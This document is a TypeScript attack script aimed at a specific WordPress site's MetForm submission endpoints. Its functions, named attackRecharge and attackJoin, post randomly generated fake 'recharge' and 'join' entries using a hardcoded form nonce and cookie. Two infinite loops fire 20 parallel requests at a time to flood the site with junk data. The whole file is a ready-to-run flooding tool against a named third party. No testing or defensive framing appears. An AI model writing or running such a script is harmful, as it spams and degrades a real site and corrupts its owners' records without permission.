import _FromData from "form-data";
import cryptoRandomString from "crypto-random-string";
import axios from "axios";
const cookieString = "tk_or=%22%22; tk_lr=%22%22; tk_r3d=%22%22";
import _ from "lodash";

const maxParellel = 20;
const timeout = 60000;

async function attackRecharge(identifer: string) {
  console.log(`Started attacking recharge ${identifer}`);
  const url = "https://wenai.ml/wp-json/metform/v1/entries/insert/3189";
  const possibleRadios = ["gift", "topup", "register"];
  const form = new _FromData();
  form.append("form_nonce", "9780a268ef");
  form.append(
    "mf-radio",
    possibleRadios[Math.floor(Math.random() * possibleRadios.length)]
  );
  form.append(
    "mf-text",
    cryptoRandomString({ length: 10, type: "alphanumeric" })
  );
  form.append(
    "mf-passcode",
    cryptoRandomString({ length: 10, type: "alphanumeric" })
  );
  form.append("mf-amount", cryptoRandomString({ length: 3, type: "numeric" }));
  try {
    const {
      data: { data },
      status,
    } = await axios.post(url, form, {
      headers: form.getHeaders({
        Cookie: cookieString,
      }),
      responseType: "json",
      timeout,
    });
    console.log(
      `Attack of recharge ${identifer} success: ${status} ${JSON.stringify(
        data
      )}`
    );
  } catch (e) {
    console.error(`Attack of recharge ${identifer} failed: ${e.toString()}`);
    return false;
  }
  return true;
}
async function attackJoin(identifer: string) {
  console.log(`Started attacking join ${identifer}`);
  const url = "https://wenai.ml/wp-json/metform/v1/entries/insert/3399";
  const form = new _FromData();
  form.append("form_nonce", "9780a268ef");
  form.append(
    "mf-name",
    cryptoRandomString({ length: 10, type: "alphanumeric" })
  );
  form.append("mf-qq", cryptoRandomString({ length: 10, type: "numeric" }));
  form.append(
    "mf-twitter",
    cryptoRandomString({ length: 10, type: "alphanumeric" })
  );
  form.append(
    "mf-link_to_profile",
    `https://${cryptoRandomString({
      length: 3,
      type: "alphanumeric",
    })}.${cryptoRandomString({
      length: 10,
      type: "alphanumeric",
    })}.com/${cryptoRandomString({ length: 10, type: "alphanumeric" })}`
  );
  form.append(
    "mf-introduction",
    cryptoRandomString({ length: 160, type: "alphanumeric" })
  );
  form.append("mf-price", cryptoRandomString({ length: 2, type: "numeric" }));
  form.append(
    "mf-available_time",
    cryptoRandomString({ length: 20, type: "alphanumeric" })
  );
  form.append(
    "mf-other_details",
    cryptoRandomString({ length: 200, type: "alphanumeric" })
  );
  try {
    const {
      data: { data },
      status,
    } = await axios.post(url, form, {
      headers: form.getHeaders({
        Cookie: cookieString,
      }),
      responseType: "json",
      timeout,
    });
    console.log(
      `Attack of join ${identifer} success: ${status} ${JSON.stringify(data)}`
    );
  } catch (e) {
    console.error(`Attack of join ${identifer} failed: ${e.toString()}`);
    return false;
  }
  return true;
}
async function attackRechargeProcess() {
  let count = 0;
  while (true) {
    ++count;
    const successCount = (
      await Promise.all(
        _.range(maxParellel).map((innerCount) => {
          return attackRecharge(`${count}-${innerCount}`);
        })
      )
    ).filter((m) => !!m).length;
    console.log(
      `${count}: ${successCount} of ${maxParellel} recharge attacks succeeded.`
    );
  }
}
async function attackJoinProcess() {
  let count = 0;
  while (true) {
    ++count;
    const successCount = (
      await Promise.all(
        _.range(maxParellel).map((innerCount) => {
          return attackJoin(`${count}-${innerCount}`);
        })
      )
    ).filter((m) => !!m).length;
    console.log(
      `${count}: ${successCount} of ${maxParellel} join attacks succeeded.`
    );
  }
}

attackRechargeProcess();
attackJoinProcess();
